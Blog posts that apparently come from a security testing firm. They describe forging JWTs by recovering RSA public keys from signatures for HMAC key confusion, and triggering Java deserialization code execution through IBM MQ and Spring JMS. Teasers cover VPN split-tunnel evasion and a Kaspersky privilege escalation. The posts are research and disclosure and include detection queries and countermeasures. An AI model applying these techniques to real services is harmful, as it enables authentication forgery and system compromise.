Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those to brave souls that dare to roll their own crypto 

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL API’s don’t trigger, but those placed at the depths of the library do, we realized that developers implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without that we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the difference of all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things that worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms exist to find the GCD of numbers since the ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this time we had a quick and dirty implementation based on the gmpy2 library that allowed us to work with large integers and modern, efficient algorithms from Python.

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation to strike me: the dirty little code we wrote for that custom RSA application can be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their ways to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is the symmetric verification process assumes that the same public key was used to generate the MAC, so if the attacker has the RSA public key, she can forge the signature too.

In practice however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

 CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to avoid key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust key filtering is, deprecating the verification API without algorithm specification is certainly the way to go)

Based on the documentation, RSA keys are provided to the encode/decode API’s (that also do signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message and signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JKS’s integer representations matches gmpy2‘s.
  • Message canonization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of tokens, no canonization of delimiters, whitespaces or special characters is necessary.
  • Message padding: JKS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low level crypto API’s (this took me a while, until I found this CTF writeup) will provide us with standards compliant output, without having to mess with ASN.1.

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allows little room for changes, so there is a high chance that if we generate a standards compliant PEM file it will match the one at the target. In case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key that can block exploitation.

After a lot of cursing because of the bugs and insufficient documentation of pyasn1 and asn1 packages, asn1tools finally proved to be usable to create custom DER (and thus PEM) structures. The generated output matched perfectly with the original public key, so I could successfully demonstrate token forgery without preliminary information about the asymmetric keys:

We tested with the 2048-bit keys from the JKS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and the algorithm produced two candidate keys for PKCS #1 which could be easily tested.

As usual, all code is available on GitHub. If you need help to integrate this technique to your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard, is to figure out all those implementation details that make pen and paper formulas work on actual computers. It won’t be a huge surprise to anyone who worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement our task was to assess the security of a service built on IBM Integration Bus, an integration platform for Java Messaging Services. These scary looking enterprise buzzwords usually hide systems of different complexities connected with Message Queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last paragraph), we opted for a white-box analysis, that allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQ’s are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post, you should read it before moving on

Our target received JMS messages using the Spring Framework. Transport of messages was done over IBM MQ (formerly IBM Websphere MQ), this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:

Source

We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this spared a lot of time), and among some dynamic tests, we ran JMET against it. To our surprise we popped a calculator in our test environment!

Now this was great, but to provide meaningful resolutions to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and done some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this is a framework issue – fortunately it wasn’t, the bug didn’t trigger. This narrowed down the code to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payload were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream, and pass it back to the user, but there is a hint of something weirder in the method signature:

 <T> T    getBody(java.lang.Class<T> c);

The method can return objects of arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents, twice: first for the compatibility check, then to create the return object.

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize, that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly chains the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the more abstract Message class is provided by the JMS API, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

receiveMessage(Message m){ /* Do something with m, whatever that is */ }

can become this:

receiveMessage(Email e){ /* Do something with an E-mail */ } 

Of course, using this functionality to automatically convert messages to random Serializable objects is a call for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization I created multiple branches of IBM’s sample application, with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even if receiveMessage()’s argument is converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the class path contains appropriate gadgets).

After inspecting the code a bit more it seems, that listener implementations can’t expect received messages to be of a certain, safe type (such as TextMessage, when the application works with Strings), so they do their best to transform the incoming messages to a type expected by the developer. Additionally, in case when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed, that they “expect messaging channels to be trusted at application level”. They also agree, that handling ObjectMessages is a difficult problem, that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accepts JMS message types, that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters, and expecting simple Message (or JMSMessage in case of IBM MQ) objects in the JmsListener prevents the problem, independently from the transport implementation. Simple getters, such as getText() can be safely used after casting. The use of even the simplest converted types, such as TextMessage with IBM MQ is insecure! Common converters, such as the JSON based MappingJackson2MessageConverter need further research, as well as other transports, that decided not to implement countermeasures:

Patches resulted from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annoted with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL a simple predicate can be used to find appropriately annotated sources:

class ReceiveMessageMethod extends Method {
ReceiveMessageMethod() {
this.getAnAnnotation().toString().matches("JmsListener")
}
}

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous API’s is also reasonably simple both in CodeQL:

predicate isJMSGetBody(Expr arg) {
exists(MethodAccess call, Method getbody |
call.getMethod() = getbody and
getbody.hasName("getBody") and
getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
arg = call.getQualifier()
)
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen on the following screenshot:

With Ocular, we can also get an exhaustive list of API’s that call ObjectInputStream.readObject() for the transport implementation in use, based on the available byte-code, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for reliant applications. Connecting paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries are soon to be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable, and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact, that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from the end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to figure out that at the end of day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to to mention the approval of these tests. Another result of this, is that in many cases message queues are treated as inherently trusted – no one can attack a magic box, that no one (at least none of us) knows how it exactly works, right?

Technical security assessments can be great opportunities to not only discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible systems. It the end, we are the ones whose job is to understand systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Tips and scripts for reconnaissance and scanning

Author: pz

Renewal paper of my GIAC Web Application Penetration Tester certification:

Tips and scripts for reconnaissance and scanning


Decrypting and analyzing HTTPS traffic without MITM

Author: dnet

Sniffing plaintext network traffic between apps and their backend APIs is an important step for pentesters to learn about how they interact. In this blog post, we’ll introduce a method to simplify getting our hands on plaintext messages sent between apps ran on our attacker-controlled devices and the API, and in case of HTTPS, shoveling these requests and responses into Burp for further analysis by combining existing tools and introducing a new plugin we developed. So our approach is less of a novel attack and more of an improvement on current techniques.

Of course, nowadays, most of these channels are secured using TLS, which provides encryption, integrity protection and authenticates one or both ends of the figurative tube. In many cases, the best method to overcome this limitation is man-in-the-middle (MITM), where a special program intercepts packets and acts as a server to the client and vice versa.

For well-written applications, this doesn’t work out-of-the-box, and it all depends on the circumstances, how many steps must be taken to weaken the security of the testing environment for this attack to work. It started with adding MITM CA certificates to OS stores, recent operating systems require more and more obscure confirmations and certificate pinning is gaining momentum. Latter can get to a point, where there’s a big cliff: either you can defeat it with automated tools like Objection or it becomes a daunting task, where you know that it’s doable but it’s frustratingly difficult to actually do it.

(more…)


Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new, or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser known class of issues in the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.

(more…)


Unix-style approach to web application testing

Author: dnet

SANS Institute accepted my GWAPT Gold Paper about Unix-style approach to web application testing, the paper is now published in the Reading Room.

The paper introduces several problems I’ve been facing while testing web applications, which converged in a common direction. Burp Suite is known by most and used by many professionals in this field, and while it’s extensible, writing such bits of software have a higher barrier of entry than the budgets of some project would allow for a one-off throwaway tool. Our solution, Piper is introduced through real-world examples to demonstrate its usage and the fact that it’s worth using it. I tried showing alternatives to each subset of the functionality to stimulate critical thinking in the minds of fellow penetration testers, since this tool is not a silver bullet either. By describing the landscape in a thorough manner, I hope everyone can learn to pick the best tool for the job, which might or might not be Piper.

The full Gold Paper can be downloaded from the website of SANS Institute:

Unix-style approach to web application testing

The accompanying code is available on GitHub. For those who prefer video content, only have 2 minutes, or find the whole idea too abstract, we made a short demonstration of the basic features below. If you’re interested in deeper internals, there’s also a longer, 45-minutes talk about it.


Wide open banking: PSD2 and us

Author: dnet

With the advent of PSD2 APIs, we had the opportunity to test some of them upon request from our clients. Although internet-facing APIs were already a thing thanks to smartphone apps, it seems that regulatory requirements and 3-way setups (customer, bank, provider) led to some surprises. Here are some of the things we found.

(more…)


Patching Android apps: what could possibly go wrong

Author: dnet

Many tools are timeless: a quality screwdriver will work in ten years just as fine as yesterday. Reverse engineering tools, on the other hand need constant maintenance as the technology we try to inspect with them is a moving target. We’ll show you how just a simple exercise in Android reverse engineering resulted in three patches in an already up-to-date tool.

(more…)


Evading Cisco AnyConnect blocking LAN connections

Author: dnet

Some VPNs allow split tunneling, however, Cisco AnyConnect and many other solutions offer a way for network administrators to forbid this. When that happens, connecting to the VPN seals off the client from the rest of the LAN. As it turns out, breaking this seal is not that hard, which can be useful for special cases like performing pentests over a VPN designed for average users.

(more…)


Self-defenseless – Exploring Kaspersky’s local attack surface

Author: b

I had the pleasure to present my research about the IPC mechanisms of Kaspersky products at the IV. EuskalHack conference this weekend. My main motivation for this research was to further explore the attack surface hidden behind the self-defense  mechanisms of endpoint security software, and I ended up with a local privilege escalation exploit that could be combined with an older self-defense bypass to make it work on default installations. I hope that the published information helps other curious people to dig even deeper and find more interesting pieces of code.

The presentation and some code examples are available on GitHub.

My local privilege-escalation exploit demo can be watched here:

The exploit code will be released at a later time on GitHub, so you can have some fun reconstructing it based on the slides ;)